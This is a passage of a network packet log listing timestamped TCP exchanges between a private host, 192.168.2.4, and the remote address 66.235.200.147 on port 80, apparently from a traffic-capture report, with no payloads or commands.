Jan 4, 2023 16:47:45.343760967 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343770981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343794107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343797922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343816042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343823910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343837976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343848944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343858004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343873978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343892097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343905926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343915939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343930006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343992949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.344012022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.344038963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.344041109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.344063044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.344067097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.344096899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.344160080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.344188929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.344213009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.344235897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.344259977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.344284058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.344302893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.344321012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.344345093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.344363928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.344810009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.344928026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.344957113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.344984055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345009089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345035076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345056057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345082045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345104933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345130920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345172882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345182896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345202923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345223904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345232010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345257998 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345259905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345277071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345290899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345304966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345318079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345333099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345345974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345367908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345374107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345386028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345397949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345421076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345422983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345442057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345448971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345463991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345474958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345493078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345499992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345514059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345525026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345541954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345550060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345566034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345577955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345587969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345602989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345622063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345644951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345645905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345669031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345674038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345691919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345706940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345731974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345752954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345777035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345778942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345794916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345803976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345828056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345829010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345851898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345855951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345876932 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345882893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.345895052 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.345926046 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346029997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346064091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346087933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346111059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346116066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346129894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346153975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346154928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346174955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346182108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346206903 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346211910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346225977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346236944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346255064 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346261024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346275091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346286058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346307039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346313953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346329927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346338987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346353054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346407890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346431971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346453905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346457005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346482038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346482038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346504927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346513033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346529007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346533060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346554995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346555948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346579075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346580982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346601963 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346606970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346621990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346632957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346647978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346657991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346677065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346684933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346700907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346724987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346749067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346772909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346774101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346796036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346807957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346821070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346839905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346848011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346868992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346874952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346899986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346901894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346923113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346925974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346945047 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346952915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.346965075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.346982002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347006083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347012043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347035885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347037077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347059011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347064972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347076893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347089052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347107887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347114086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347131014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347147942 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347171068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347172976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347198009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347199917 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347220898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347230911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347240925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347256899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347276926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347285986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347301960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347316027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347337961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347363949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347369909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347390890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347394943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347419024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347419024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347441912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347443104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347465038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347469091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347484112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347493887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347513914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347521067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347532034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347548008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347574949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347596884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347599030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347623110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347625971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347645044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347659111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347671032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347677946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347697020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347697020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347719908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347723007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347739935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347748995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347759962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347774029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347791910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347800016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347810984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347824097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347850084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347858906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347882032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347883940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347898960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347908974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347920895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347934008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347955942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347959042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.347981930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.347982883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348002911 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348009109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348023891 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348042011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348071098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348088980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348094940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348118067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348120928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348145962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348150015 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348169088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348174095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348192930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348201990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348231077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348234892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348256111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348258972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348278999 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348284960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348297119 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348309994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348330021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348342896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348350048 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348373890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348397017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348417997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348421097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348444939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348447084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348467112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348479033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348491907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348498106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348517895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348519087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348541021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348543882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348556995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348568916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348587990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348598003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348628044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348640919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348655939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348658085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348679066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348681927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348699093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348707914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348731995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348733902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348754883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348757982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348782063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348788023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348809004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348814964 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348830938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348835945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348855019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348862886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348876953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348887920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348910093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348912954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348928928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348937035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348956108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348963976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.348973036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.348989964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349010944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349018097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349030972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349042892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349066019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349066973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349087954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349093914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349109888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349119902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349133015 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349143982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349168062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349168062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349184990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349193096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349208117 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349224091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349237919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349250078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349268913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349276066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349287033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349301100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349319935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349327087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349339962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349351883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349374056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349380016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.349395037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.349404097 CET	80	49696	66.235.200.147	192.168.2.4
